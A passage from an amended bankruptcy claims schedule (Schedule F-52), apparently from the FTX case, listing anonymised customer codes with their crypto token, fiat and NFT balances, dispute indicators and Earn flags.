| 07417404 | | AAVE[.007086], AVAX[.00094], GRT[.7819], MATIC[7.891], NEAR[.08446], SHIB[71120], SOL[.00378], USD[4.49] | | |
| 07417405 | | DOGE[0], ETH[0], USD[42.71] | Yes | |
| 07417407 | | BTC[0.00000289], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07417410 | | DOGE[1], USD[0.00] | Yes | |
| 07417419 | | USD[9.27] | | |
| 07417425 | | BTC[.00421628], CUSDT[2], DOGE[1271.61614276], USD[0.00] | | |
| 07417427 | | BTC[.0000004], USD[2.04] | | |
| 07417431 | | BTC[.0000738], DOGE[2578.419], USD[38.58] | | |
| 07417434 | | DOGE[.384], ETH[.00041226], ETHW[0.00041225], LINK[.0336], MATIC[4.12], SOL[.01238], USD[0.00] | | |
| 07417435 | | BTC[.00063158], USD[0.00] | Yes | |
| 07417444 | | CUSDT[1], USD[0.00] | | |
| 07417446 | | CUSDT[2], DAI[.6272658], DOGE[47.72086148], ETH[0], TRX[75.29630700] | | |
| 07417457 | | BAT[0], CUSDT[1], DOGE[0], ETH[0.00495886], ETHW[0.00489787], GRT[0], KSHIB[0], SHIB[1315947.76047374], SOL[0], TRX[0], USD[0.00], USDT[0] | Yes | |
| 07417463 | | USD[4.30] | Yes | |
| 07417464 | | USD[0.60] | | |
| 07417466 | | CUSDT[3], DOGE[447.81141483], LINK[.00000913], TRX[1], USD[0.00], USDT[0] | Yes | |
| 07417467 | | CUSDT[1], SUSHI[2.31737994], USDT[0.00230002] | | |
| 07417477 | | BTC[0], CUSDT[1], DOGE[0], TRX[35.30022628], USD[0.04] | | |
| 07417478 | | DOGE[0] | | |
| 07417480 | | ETH[0], USD[0.02] | Yes | |
| 07417482 | | CUSDT[1], TRX[239.41406848], USD[0.00] | | |
| 07417484 | | BTC[0], DOGE[0], TRX[0], USD[0.00], USDT[0] | | |
| 07417487 | | BAT[1.00006391], BCH[.02506204], BRZ[4], BTC[.00000001], CUSDT[24], NFT [329536755762334771/Entrance Voucher #24860)[1], NFT [394803190128112755/Bahrain Ticket Stub #2145)[1], TRX[6], USD[0.36], USDT[11.11000529] | Yes | |
| 07417488 | | BTC[0], CUSDT[0], DOGE[0], ETH[0.00003868], ETHW[0.00003869], MATIC[0], NFT [381019656596450703/FTX - Off The Grid Miami #753)[1], PAXG[0], SUSHI[0], UNI[0], USD[0.00], USDT[0.00002783] | Yes | |
| 07417497 | | CUSDT[4], DOGE[0], NFT [294751906658002803/Cyber Frogs Ramen)[1], NFT [352982323795088453/7382)[1], NFT [447933537699999804/Cool Bean #2115)[1], NFT [473852205328575180/Solana Bunny Business #138)[1], NFT [525366893043491494/Frog #7014)[1], SOL[0.20556833], TRX[2], USD[0.00] | Yes | |
| 07417500 | | USD[0.06] | | |
| 07417510 | | DOGE[2], TRX[1], USD[0.00] | | |
| 07417513 | | BRZ[0.00124843], GRT[1], USD[0.00] | | |
| 07417515 | | BTC[0], DOGE[0.00003273], USD[0.00] | | |
| 07417516 | | DOGE[1], USD[0.00] | | |
| 07417519 | | BRZ[1], SOL[20.85629034], USD[0.19] | Yes | |
| 07417521 | | USD[0.12] | Yes | |
| 07417522 | | BRZ[3], BTC[0], CUSDT[1], DOGE[3], LINK[.00000163], TRX[3], USD[0.00] | | |
| 07417526 | | BAT[0], BRZ[0], BTC[0], CHF[0.00], CUSDT[0], DOGE[0], ETH[0.00000210], ETHW[0.00000210], HKD[0.00], LINK[0], PAXG[0], SGD[0.00], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], WBTC[0], YFI[0] | | |
| 07417528 | | CUSDT[11], DOGE[2], ETH[.01266329], ETHW[.01250692], GRT[1.00313735], SHIB[7064269.64044759], TRX[3], USD[0.03] | Yes | |
| 07417530 | | ETH[.00000001], SUSHI[0], USD[0.00], USDT[0] | | |
| 07417549 | | SOL[0], USD[0.00], USDT[0.00000029] | | |
| 07417553 | | CUSDT[1], DOGE[26.69386069], USD[0.00] | | |
| 07417559 | | USD[0.00], USDT[0] | | |
| 07417561 | | BRZ[1], CUSDT[4], DOGE[2], TRX[2], USD[0.00] | Yes | |
| 07417565 | | BAT[0.00008126], BCH[0.00000812], BTC[.00000002], CUSDT[2], DAI[.00985847], DOGE[2], ETH[.00003631], ETHW[.00003631], GRT[0], LINK[0.00000080], LTC[0.00014625], PAXG[0.00001009], SOL[0.00000711], SUSHI[0.00005593], TRX[2], UNI[0], USD[0.00], USDT[0.00977999], YFI[0.00000094] | | |
| 07417566 | | BRZ[1], CUSDT[4701.31642555], DOGE[574.06493175], USD[0.91] | | |
| 07417567 | | BTC[.00000616] | | |
| 07417568 | | BTC[.00008382], ETH[.02], ETHW[1.02], USD[0.00], USDT[.0059384] | | |
| 07417569 | | CUSDT[10536.09430752], DOGE[13570.40192947], ETH[.22530036], ETHW[.22530036], GRT[2], LTC[2.13433817], TRX[10358.32814448], USD[1606.56], USDT[25] | | |
| 07417572 | | AAVE[0], BAT[0], BRZ[1], CUSDT[5], DOGE[2], ETH[0], ETHW[0], GRT[1], LINK[0], SHIB[0], SUSHI[0], TRX[3], USD[0.00] | | |
| 07417574 | | BCH[.00389891], BTC[.00004012], ETH[.00057087], ETHW[.00057087], GRT[.47755189], LTC[.01021808], SOL[.07607768], TRX[19.58823569], USD[0.00] | | |
| 07417578 | | BTC[.00000134], DOGE[.93105444], ETH[.0001764], ETHW[.03260987], SHIB[1], USD[0.00] | Yes | |
| 07417580 | | BAT[3.08932519], BRZ[7.36188275], CUSDT[23], DAI[158.23325197], DOGE[13.12512995], GRT[2], LINK[.00000914], SHIB[47], TRX[7], USD[150.44], USDT[6791.70136932] | Yes | |
| 07417585 | | ETH[.000596], ETHW[.000596], SOL[.056], USD[0.01], USDT[4.8289188] | | |
| 07417586 | | CUSDT[2], USD[0.00] | | |
| 07417588 | | CUSDT[5.40471343], DOGE[281.89936196], SOL[3.56208929], UNI[3.58974196], USD[0.22] | | |
| 07417589 | | USD[0.00] | | |
| 07417590 | | MATIC[0], USD[0.00] | | |
| 07417598 | | CUSDT[5], DOGE[124.19223067], GRT[40.50363413], NFT [436378385366188386/Desert Rose 2023 GA Passes #8 (Redeemed)[1], NFT [576410687135039258B/Coachella x FTX Weekend 1 #19114)[1], TRX[2], USD[0.00], YFI[0] | Yes | |
| 07417601 | | BAT[38.33586670], BRZ[1], CUSDT[4], DOGE[1091.71023259], ETH[.00000003], ETHW[.09040729], GRT[69.17344366], MATIC[56.69813752], SHIB[1251752.04746176], TRX[2503.29877141], USD[0.61] | Yes | |
| 07417602 | | DOGE[944.77470616], USD[0.00] | | |
| 07417611 | | USD[0.19] | | |
| 07417613 | | USDT[.01314] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07417615 | | DOGE[1], ETH[.00733405], ETHW[.00723822], USD[0.00] | Yes | |
| 07417622 | | ALGO[228.54005286], AVAX[101.07902744], BRZ[2], BTC[0.01718320], CUSDT[7], DOGE[9.01859444], ETH[1.58273000], ETHW[6.93812183], LTC[0], MATIC[1809.39113403], SHIB[368213976623488], SOL[53.36061249], SUSHI[340.91205176], TRX[9], USD[1.05], USDT[0] | Yes | |
| 07417626 | | CUSDT[1], DOGE[1], USD[44.00] | | |
| 07417632 | | BAT[1], BRZ[1], BTC[.0000069], CUSDT[1], DOGE[21528.32518069], ETH[.77889854], ETHW[.77889854], GRT[1], TRX[2], USD[0.00], USDT[1] | | |
| 07417640 | | SOL[.07992], USD[1.30] | | |
| 07417648 | | USD[47.59] | | |
| 07417650 | | BRZ[1], CUSDT[1], TRX[1], USD[0.82] | Yes | |
| 07417651 | | USD[19.07] | Yes | |
| 07417653 | | CUSDT[2], USD[0.01] | | |
| 07417656 | | BTC[0], DOGE[0], ETH[0.00098678], ETHW[0.00098678], TRX[0], USD[0.50], USDT[0] | | |
| 07417666 | | CUSDT[2], DOGE[0], UNI[0], USD[0.00] | | |
| 07417668 | | DOGE[1], USD[0.00] | Yes | |
| 07417673 | | CUSDT[1], USD[95.49], USDT[0] | Yes | |
| 07417674 | | AVAX[2.61952928], BF_POINT[500], BRZ[1], CUSDT[6], DOGE[3], ETH[.37237802], GRT[2], MATIC[364.92071956], SHIB[7], SOL[93.37171414], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07417675 | | SUSHI[.00022063], USD[0.00] | | |
| 07417676 | | USD[0.01], USDT[0.00000001] | | |
| 07417677 | | BTC[0.00000485], CUSDT[1], ETH[0], ETHW[0], USD[0.00], USDT[0.00000420], YFI[0] | | |
| 07417682 | | DOGE[2], ETH[0], ETHW[0], SOL[0], TRX[1], USD[0.00], USDT[0] | | |
| 07417683 | | BTC[0], CUSDT[5], DOGE[1], GRT[0], SOL[0], TRX[0], USD[0.01], USDT[0.00069835] | Yes | |
| 07417690 | | ETH[.000999], ETHW[.000999], USD[0.25] | | |
| 07417692 | | USD[0.00] | | |
| 07417693 | | USD[0.00] | | |
| 07417694 | | BTC[.00000028], USD[.03] | | |
| 07417695 | | BTC[.1998], DOGE[249.75], ETH[.8991], ETHW[.8991], LINK[.04715221], SOL[.0592], TRX[90], USDT[595.8774288] | | |
| 07417698 | | BRZ[2], DOGE[1], ETHW[.04447531], LINK[128.70409937], SHIB[5], TRX[1], USD[98.19] | | |
| 07417706 | | NFT [289371964003996767/Smoke #002][1], NFT [353582451939644816/6 FTX Planet #7][1], NFT [397068590731566627/Trinity][1], NFT [428780885939885502/Entrance Voucher #3880][1], NFT [447167588936810653/FTX Planet #10][1], NFT [467642916359338307/Lucifer - Baby Legends #001][1], NFT [491964644526204198/Infinity #19 #2][1], NFT [524904672513453396/FTX Planet #13][1], NFT [532534680711410296/Jar][1], NFT [556373100368081915/FTX Planet #12][1], NFT [556570817118216349/Infinity #8][1], SHIB[18], USD[2414.97], USDT[0] | Yes | |
| 07417708 | | ETH[.00113528], ETHW[.00112159], NFT [474219387248949589/The Hill by FTX #7950][1] | | |
| 07417712 | | CUSDT[1], DOGE[30], TRX[1], USD[0.00] | Yes | |
| 07417713 | | BRZ[2], CUSDT[30], USD[0.00] | | |
| 07417714 | | BF_POINT[800], DOGE[2], ETH[.00064956], ETHW[111.75755222], SOL[.00328236], TRX[.000001], USD[0.01] | Yes | |
| 07417715 | | BTC[.00006378], TRX[.000002], USDT[2.6329996] | | |
| 07417716 | | BAT[.38839089], CUSDT[46.29157266], DOGE[18.49036368], TRX[7.79976629], USD[0.02] | | |
| 07417719 | | BRZ[2], CUSDT[6], DOGE[5.12488555], SOL[5.00015528], TRX[6], USD[0.00], USDT[1.10702905] | Yes | |
| 07417720 | | NFT [352038634130075045/first ftx nft - bitcoin #2][1], NFT [363208760392269372/first ftx nft - bitcoin #4][1], NFT [393585820158331657/Water through rocks #3][1], NFT [422949414643501637/Water through rocks #1][1], NFT [450236443680642626/Water through rocks #4][1], NFT [500291788591537454/first ftx nft - bitcoin #5][1], NFT [525335360883249412?/Water through rocks #2][1], NFT [535202824268050679/first ftx nft - bitcoin #1][1], NFT [537189936168645604/first ftx nft - bitcoin #3][1], USD[0.01], USDT[2.8987] | | |
| 07417722 | | USD[0.00] | | |
| 07417729 | | BRZ[3], CUSDT[8], SHIB[16575078.11699158], TRX[1], USD[0.86], USDT[1.10512995] | Yes | |
| 07417737 | | USD[0.00] | | |
| 07417742 | | AAVE[0], BAT[0], BCH[0], BTC[0], DOGE[0], ETH[0.00000001], GRT[0], KSHIB[0], LINK[0], LTC[0], MATIC[0], SHIB[4], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07417757 | | USD[0.00] | | |
| 07417761 | | BTC[0], CUSDT[0], DOGE[0], ETH[0], SOL[0], USD[0.01] | | |
| 07417766 | | USD[0.00] | Yes | |
| 07417771 | | USD[0.00] | | |
| 07417775 | | BAT[0], BCH[0], BTC[0], CUSDT[2], DOGE[2], GRT[1.00498957], SOL[1.21092640], TRX[2], UNI[0], USD[74.85], USDT[0], YFI[0] | Yes | |
| 07417776 | | BF_POINT[300], USD[0.00], USDT[0] | Yes | |
| 07417778 | | CUSDT[1], ETH[.00347179], ETHW[.00347179], USD[0.00] | | |
| 07417786 | | TRX[1], USD[0.00] | | |
| 07417788 | | BTC[.000633], USD[0.00] | | |
| 07417789 | | USD[0.00] | | |
| 07417795 | Contingent, Disputed | AAVE[0], BAT[0], BCH[0], BTC[0.00006881], CUSDT[2], DOGE[0], ETH[0], ETHW[0], GRT[0], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0.00000010] | Yes | |
| 07417796 | | BRZ[1], BTC[.00083588], CUSDT[3], DOGE[68.65082778], USD[0.00] | Yes | |
| 07417797 | | DOGE[1808.24312693], USD[1.28] | | |
| 07417802 | | BTC[.00000547], ETH[0] | | |
| 07417808 | | BRZ[1], CUSDT[17], DOGE[2], ETH[0.00000001], ETHW[0], LINK[0], SUSHI[0], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07417811 | | USD[0.01] | | |
| 07417819 | | BRZ[1], CUSDT[2], DOGE[2982.26601464], USD[0.00] | Yes | |
| 07417827 | | AUD[0.00], BTC[0], CAD[0.00], DOGE[0], ETH[0], EUR[0.00], GBP[0.00], SGD[0.00], USD[0.01], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07417829 | | BAT[3.11713442], BF_POINT[300], BRZ[1], BTC[.00000219], CUSDT[11], DOGE[0], GRT[1], MATIC[0.02703322], SHIB[2], SOL[0], TRX[11], USD[15210.36] | Yes | |
| 07417831 | | CUSDT[2], USD[0.00] | | |
| 07417836 | | USD[18.85] | | |
| 07417838 | | USD[0.00] | | |
| 07417843 | | BRZ[14.85312478], CUSDT[30], DOGE[13.20623145], MATIC[327.10471022], SHIB[17], SOL[16.02930227], TRX[17.20276544], USD[0.00], USDT[1.00653265] | Yes | |
| 07417844 | | DOGE[0], USD[0.01], USDT[0] | | |
| 07417849 | | USD[5.57] | | |
| 07417852 | | BCH[0], BTC[0.00001611], USD[0.00] | | |
| 07417857 | | USD[0.00] | | |
| 07417859 | | BTC[.00028205], USD[0.40] | | |
| 07417862 | | DOGE[.48524733], USD[0.00], USDT[0] | Yes | |
| 07417864 | | CUSDT[1], DOGE[727.11031450] | | |
| 07417865 | | BTC[0], NFT (469539097247981914/FTX - Off The Grid Miami #1582)[1], NFT (566423736178167238/Bahrain Ticket Stub #180)[1], SHIB[3], TRX[.000033], USD[0.00] | Yes | |
| 07417868 | | CUSDT[1], SHIB[745042.09298077], USD[0.00] | Yes | |
| 07417874 | | USD[0.00] | | |
| 07417881 | | USD[239.19] | | |
| 07417882 | | USD[0.00] | | |
| 07417883 | | AAVE[.00000001], AVAX[0], BTC[0], ETH[0], ETHW[0.00099768], MATIC[7.53911414], SOL[0], UNI[.00000001], USD[0.48], USDT[0] | | |
| 07417884 | | CUSDT[1], ETH[.00000173], ETHW[.00000173], SOL[2.28017872], TRX[1], USD[0.00] | Yes | |
| 07417886 | | BRZ[1], DOGE[1], USD[0.00], USDT[0.00000798] | | |
| 07417893 | | CUSDT[2], DOGE[0], ETH[0], SOL[0], TRX[0], USD[0.00] | | |
| 07417900 | | ETH[.019], ETHW[.019] | | |
| 07417901 | | AVAX[1.18307161], BCH[.00002751], BTC[.00000001], CUSDT[1], DAI[1.49758916], DOGE[3], NFT (401651532018398268/Entrance Voucher #2187)[1], SHIB[1], SUSHI[58.76878641], USD[1.38] | Yes | |
| 07417907 | | CUSDT[1], USD[0.00] | | |
| 07417909 | | BAT[.492], DOGE[1489.119], GRT[269.916], SUSHI[34.91388294], USD[0.00] | | |
| 07417914 | | DOGE[.69145497], USD[5.49] | | |
| 07417920 | | BTC[.05345263], DOGE[6428.8406993], MATIC[1196.85480819], SOL[56.71156694], USD[0.00] | | |
| 07417925 | | ETH[.0625681], SHIB[1], USD[0.64] | Yes | |
| 07417928 | | DOGE[1108.00773822], USD[0.00] | | |
| 07417929 | | CUSDT[1], USD[0.00] | Yes | |
| 07417931 | | ALGO[2114.07666255], BAT[1605.20464836], CUSDT[1], DOGE[3636.3716889], GRT[3.03477966], MATIC[6631.87393153], SHIB[114386466.87948173], SOL[15.55671300], TRX[2], USD[0.00], USDT[1.02536123] | Yes | |
| 07417933 | | DOGE[1], TRX[1], USD[0.01] | | |
| 07417941 | Contingent, Disputed | CUSDT[189.69731394], DOGE[700.60131878], MATIC[9.00173869], USD[0.00] | | |
| 07417944 | | BTC[0], ETH[0], LTC[0], USD[0.00] | Yes | |
| 07417949 | | CUSDT[1], USD[0.00] | | |
| 07417951 | | BTC[0], SOL[0], SUSHI[0] | | |
| 07417959 | | BTC[.00054923] | | |
| 07417962 | | CUSDT[2], DOGE[2], GRT[163.98959593], USD[0.00] | | |
| 07417964 | | TRX[2], USD[0.01] | | |
| 07417969 | | CUSDT[3], DOGE[7726.57431168], USD[0.00] | | |
| 07417974 | | BTC[0.02538067], SHIB[4], SOL[7.68371455], USD[-23.00] | Yes | |
| 07417978 | | USD[7.75] | | |
| 07417979 | | BTC[0], USD[0.00] | | |
| 07417985 | | CUSDT[1], DOGE[1], TRX[2], USD[0.01] | Yes | |
| 07417986 | | ETH[.00030457], ETHW[0], USD[0.00] | | |
| 07417990 | | USD[250.00] | | |
| 07417993 | | TRX[2], USD[0.00] | | |
| 07418002 | | CUSDT[1], DOGE[0.00943157], PAXG[0], USD[0.01] | | |
| 07418006 | | USD[0.00] | | |
| 07418007 | | DOGE[19862.30613783], SOL[77.26594973], USD[0.17] | | |
| 07418010 | | CUSDT[11], TRX[3], USD[0.01] | | |
| 07418011 | | LTC[0], USDT[0.00000039] | | |
| 07418012 | | USD[0.00] | | |
| 07418015 | Contingent, Disputed | AAVE[.0096], BTC[0.00377829], USD[1.32] | | |
| 07418016 | | BTC[0] | | |
| 07418019 | | BTC[.00196676], CUSDT[3], DOGE[1369.01166586], ETH[.02404511], ETHW[.02374415], TRX[101.73928107], USD[0.00] | Yes | |
| 07418020 | Contingent, Disputed | BTC[.0000856], USD[0.00], USDT[.003156] | | |
| 07418027 | | BRZ[2], CUSDT[17], DOGE[1.00001284], SUSHI[.00003721], TRX[7], USD[7.65] | | |

Amended Schedule F-52 Nonpriority Unsecured Customer Claims

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07418030 | | USD[0.01] | | |
| 07418031 | | BTC[.00000008], CUSDT[2], GRT[1], SHIB[6], SOL[0], USD[4.40], USDT[0.00001880] | Yes | |
| 07418032 | | ETH[0], ETHW[0], SOL[0.02818072], USD[23.60] | | |
| 07418034 | | USD[9.27] | | |
| 07418039 | | SOL[0], USD[0.00] | | |
| 07418041 | | DOGE[2], USD[0.00], USDT[0.00007116] | Yes | |
| 07418048 | | TRX[1], USD[0.00] | | |
| 07418049 | | CUSDT[1], DOGE[296.79749815], USD[0.00] | | |
| 07418052 | | BCH[.01306641], BTC[.00036533], CUSDT[2], DOGE[1], ETH[.01550137], ETHW[.01550137], USD[0.00] | | |
| 07418054 | | BTC[0], MATIC[9.14801419], USD[0.00] | | |
| 07418056 | | BAT[1], USD[0.00], USDT[2857.3328836] | | |
| 07418057 | | CUSDT[7], DOGE[0], SOL[1.24410302], TRX[4], USD[0.00] | Yes | |
| 07418058 | | DOGE[1190.248], ETH[.00058], ETHW[.00058], LINK[.0943], LTC[.00816], SUSHI[.37725693], TRX[.276], UNI[.08], USD[0.12], USDT[.778486] | | |
| 07418065 | | LINK[.03402968], MATIC[.00843739], UNI[.02988219], USD[0.00], USDT[.008519] | Yes | |
| 07418066 | | BTC[0], SOL[0] | | |
| 07418067 | | BAT[1], CUSDT[1], USD[0.01] | | |
| 07418068 | | DOGE[0], SUSHI[0], TRX[0], USD[0.00] | Yes | |
| 07418070 | | DAI[178.36940398], DOGE[1], TRX[1], USD[2.58], USDT[198.88146874] | | |
| 07418078 | | BTC[.000096], DOGE[.076], UNI[0], USD[0.00], USDT[0] | | |
| 07418095 | | BAT[1.0165555], DOGE[3], UNI[3.29249135], USD[0.00], USDT[0] | Yes | |
| 07418096 | | SOL[.01007993], USD[0.00] | Yes | |
| 07418099 | | BTC[.00200793], DOGE[972.49475438], ETH[.02385521], ETHW[.02385521], USD[135.81] | | |
| 07418104 | | ETH[.03476486], ETHW[.03476486], USD[0.00] | | |
| 07418105 | | CUSDT[4], DOGE[1062.90897869], ETH[2.25277324], ETHW[2.25180648], TRX[2], USD[0.00] | Yes | |
| 07418106 | | CUSDT[1], DOGE[5113.42953775], TRX[3], USD[0.00] | | |
| 07418107 | | USD[0.01] | | |
| 07418109 | | ETH[.00000001], USD[0.00] | | |
| 07418115 | | DOGE[57.42434581], USD[0.22] | | |
| 07418117 | | BAT[0.00855918], BCH[.00000077], BRZ[.00067946], BTC[.00000121], CUSDT[.15319171], DOGE[0.06836264], ETH[.00000687], ETHW[.00000687], GRT[.02886352], LINK[.00004957], LTC[.00000014], SOL[.00001046], SUSHI[.0086694], TRX[0.00058652], UNI[0.00007111], USD[0.46] | | |
| 07418119 | | BRZ[1], BTC[.00646378], DOGE[3], ETH[.02989787], ETHW[.02989787], TRX[491.36031333], USD[0.00] | | |
| 07418120 | | BRZ[1], CUSDT[1.00001787], DOGE[1.00003266], USD[0.84] | | |
| 07418123 | | AVAX[30.90025373], BAT[4.29145392], BRZ[7.27807024], CUSDT[12], DOGE[23.41076376], ETH[.00003299], ETHW[3.82115979], MATIC[10], SHIB[12], SUSHI[.00281947], TRX[25.00485112], USD[8181.91], USDT[6.40844336] | Yes | |
| 07418131 | | USD[0.00] | | |
| 07418132 | | BTC[.00017326] | | |
| 07418134 | | USD[0.00] | | |
| 07418135 | | BTC[0], ETH[.000572], ETHW[.000572], LTC[0], SOL[0], USD[0.07] | | |
| 07418137 | | TRX[.372068] | | |
| 07418138 | | CUSDT[1], TRX[196.27108491], USD[8.54] | | |
| 07418142 | | CUSDT[1], DOGE[1006.18601742], SHIB[67991.44783464], TRX[5688.29691786], USD[0.00] | | |
| 07418144 | | BTC[0], CUSDT[1], USD[0.00] | | |
| 07418155 | | CUSDT[2], DOGE[0], SHIB[2900257.56857643], TRX[1], USD[0.00] | | |
| 07418156 | | CUSDT[2], USD[0.00] | Yes | |
| 07418159 | | BRZ[2], CUSDT[2], DOGE[2151.13505023], ETH[0], TRX[1] | Yes | |
| 07418162 | Contingent, Disputed | ETH[0], TRX[0.00001700], USD[0.00], USDT[0] | Yes | |
| 07418163 | | BTC[0], DOGE[11], ETH[0], SOL[0], USD[0.12], YFI[0] | | |
| 07418164 | | CUSDT[1], DOGE[2], ETH[0], USD[0.00], USDT[0.00000008] | | |
| 07418168 | | USD[0.94] | | |
| 07418169 | | DOGE[0], USD[0.00] | | |
| 07418172 | | BAT[0], BCH[0], BTC[0], CUSDT[0], DOGE[0], ETH[0], GRT[0], KSHIB[0], LINK[0], LTC[0], PAXG[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.00], USDT[0], YFI[0] | | |
| 07418175 | | DOGE[394.12213940], TRX[1], UNI[.00000001], USD[0.00] | | |
| 07418183 | | BTC[.00000131], LTC[.00003055], SUSHI[.00291183], USD[0.06], USDT[0] | Yes | |
| 07418190 | | USD[90.70] | | |
| 07418199 | | TRX[.000002], USD[0.00], USDT[0] | | |
| 07418204 | | BTC[.0001], DOGE[152.68264722], ETH[.00662047], ETHW[.00662047], USD[0.00] | | |
| 07418207 | | BCH[.01915848], CUSDT[2], TRX[3], USD[0.00] | | |
| 07418210 | | BTC[0.00062956], CUSDT[1], DOGE[64.41928123], ETH[0.00606828], ETHW[0.00606828], GRT[0], LTC[0.12214510], USD[0.00] | | |
| 07418221 | | TRX[1], USD[0.00] | | |
| 07418228 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07418229 | | USD[0.00] | | |
| 07418230 | | CUSDT[2], SHIB[2496508.63815005], TRX[1], USD[0.05] | | |
| 07418232 | | DOGE[3], USD[0.00] | | |
| 07418233 | | BTC[0], USD[0.23] | | |
| 07418235 | | USD[0.01], USDT[0] | | |
| 07418260 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], TRX[5], USD[0.01] | | |
| 07418266 | | BTC[0], DOGE[0], ETH[0], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07418270 | | CUSDT[704.6742884], DOGE[158.74271043], EUR[24.46], USD[0.00] | | |
| 07418272 | | ETHW[42.1437332], USD[5794.61] | | |
| 07418273 | | BAT[1], DOGE[1614.86313311], LINK[.08762838], TRX[1], USD[32.26] | | |
| 07418276 | | ETH[.00038643], ETHW[.00038643], USD[0.00] | | |
| 07418277 | | DOGE[3], TRX[1], USD[0.00] | | |
| 07418278 | | BAT[1], CUSDT[2], LTC[0], TRX[.000001], USD[0.00], USDT[0] | | |
| 07418284 | | BAT[.23701738], CUSDT[.40942775], DOGE[.1840401], KSHIB[.67066416], SHIB[257217.32033868], SOL[.00698992], TRX[.20773309], USD[0.82] | | |
| 07418288 | | BRZ[1], CUSDT[2], DOGE[2.8], LINK[3.62290783], TRX[704.16491468], USD[109.44] | | |
| 07418292 | | CUSDT[9], LTC[.00000075], TRX[.0047908], USD[0.00] | Yes | |
| 07418294 | | BRZ[1], ETHW[2.12014115], SHIB[97], TRX[2], USD[0.00] | Yes | |
| 07418297 | | CUSDT[1], DOGE[.84299851], USD[0.00] | | |
| 07418298 | | BAT[1.01327008], BCH[2.28677976], BRZ[2], BTC[.09275044], CUSDT[2], DOGE[3191.48697908], ETH[3.57693841], ETHW[3.57543611], GRT[1.00390506], LINK[66.76411189], USD[0.00] | Yes | |
| 07418308 | | ETH[.00000001], NFT [303474490042852894/Swanky & Moo Moo #4][1], NFT [354843694235602137/The Hill by FTX #3951][1], NFT [534305179633129287/Big Whale Energy vial][1], SOL[0.00000001], USD[32.06], USDT[0] | | |
| 07418309 | | USD[48.21] | | |
| 07418310 | | CUSDT[7], DOGE[915.34150354], SHIB[2386793.21465864], SOL[25.34940938], TRX[2], USD[159.15] | Yes | |
| 07418312 | | BTC[0], USD[0.03] | | |
| 07418314 | | BTC[.00030536], CUSDT[1], USD[0.00] | Yes | |
| 07418319 | | BTC[.0015561], DOGE[1743.44362796], ETH[.03465653], ETHW[.03422733], TRX[205.78946163], USD[0.00], USDT[0] | Yes | |
| 07418322 | | BTC[0.0009040], ETH[0], USD[0.00], USDT[.003615] | | |
| 07418324 | | USD[5.25] | | |
| 07418325 | | BTC[.00008569], TRX[1], USD[25.31] | | |
| 07418326 | | USD[49.49] | | |
| 07418329 | | UNI[0], USD[0.01], USDT[0] | | |
| 07418333 | | NFT [432574605519696093/Lost][1], NFT [489148762199263125/Blue][1], NFT [568502511410282945/Tyme][1], NFT [573518112259169248/lebron][1], USD[7.00] | | |
| 07418339 | | NFT [386591229533470236/Entrance Voucher #2676][1] | | |
| 07418341 | | BF_POINT[800], BTC[0], DOGE[0], ETH[0], ETHW[0], NFT [305687185821463596/Selfie #1][1], NFT [429167295603365176/Juliet #448][1], NFT [499193410773622189/Rekt Card][1], NFT [523328426917404386/Humpty Dumpty #315][1], SOL[0], USD[0.00], USDT[0.00004418] | | |
| 07418344 | | ETH[.00593444], ETHW[.00593444], USD[8.85] | | |
| 07418347 | | BTC[0.97090841], ETH[.00000001], ETHW[0], USD[-13808.05], USDT[0] | | |
| 07418348 | | SOL[0], USD[2.50], USDT[0.00000012] | | |
| 07418349 | | DOGE[1], USD[0.00] | | |
| 07418352 | | USD[0.00], USDT[1] | | |
| 07418354 | | ETH[.017], ETHW[.017], USD[2.57] | | |
| 07418356 | | BAT[111.19194538], BRZ[3], CUSDT[5.01087854], DOGE[102.90295622], ETH[0], ETHW[2.63529593], GRT[.00236638], MATIC[.00146399], SHIB[2], SOL[0.00000001], SUSHI[0.00027958], TRX[4.00062887], USD[0.02], USDT[0.44234549] | Yes | |
| 07418358 | | BRZ[1], BTC[0], CUSDT[3], DOGE[829.81262318], ETH[.01068082], ETHW[0.01054401], LINK[.90468721], MATIC[493.75879312], TRX[1366.61988493], USD[0.00] | Yes | |
| 07418360 | | CUSDT[937.41164989], DOGE[99.0995175], USD[0.43], USDT[1] | | |
| 07418366 | | BTC[0], USD[0.18] | | |
| 07418376 | | BRZ[2], BTC[0], CUSDT[3], DOGE[0], ETH[0], SUSHI[.05920485], TRX[7], USD[0.00], USDT[0.00000001] | | |
| 07418383 | | TRX[.20203313], USD[0.00] | | |
| 07418384 | | CUSDT[100.07844183], LINK[1.09526902], LTC[.23010814], USD[0.00] | Yes | |
| 07418385 | | DOGE[1], ETH[.0000001], ETHW[0], SOL[0] | | |
| 07418386 | | BRZ[1], BTC[0], LINK[.01739943], USD[1.22], USDT[0] | | |
| 07418391 | | BRZ[1], CUSDT[1], DOGE[4842.40370426], GRT[1.00498957], TRX[21423.75391172], USD[4962.18] | Yes | |
| 07418393 | | CUSDT[1], DOGE[901.71883265], TRX[1], USD[0.37] | | |
| 07418399 | | LINK[.02323003], USD[0.00] | | |
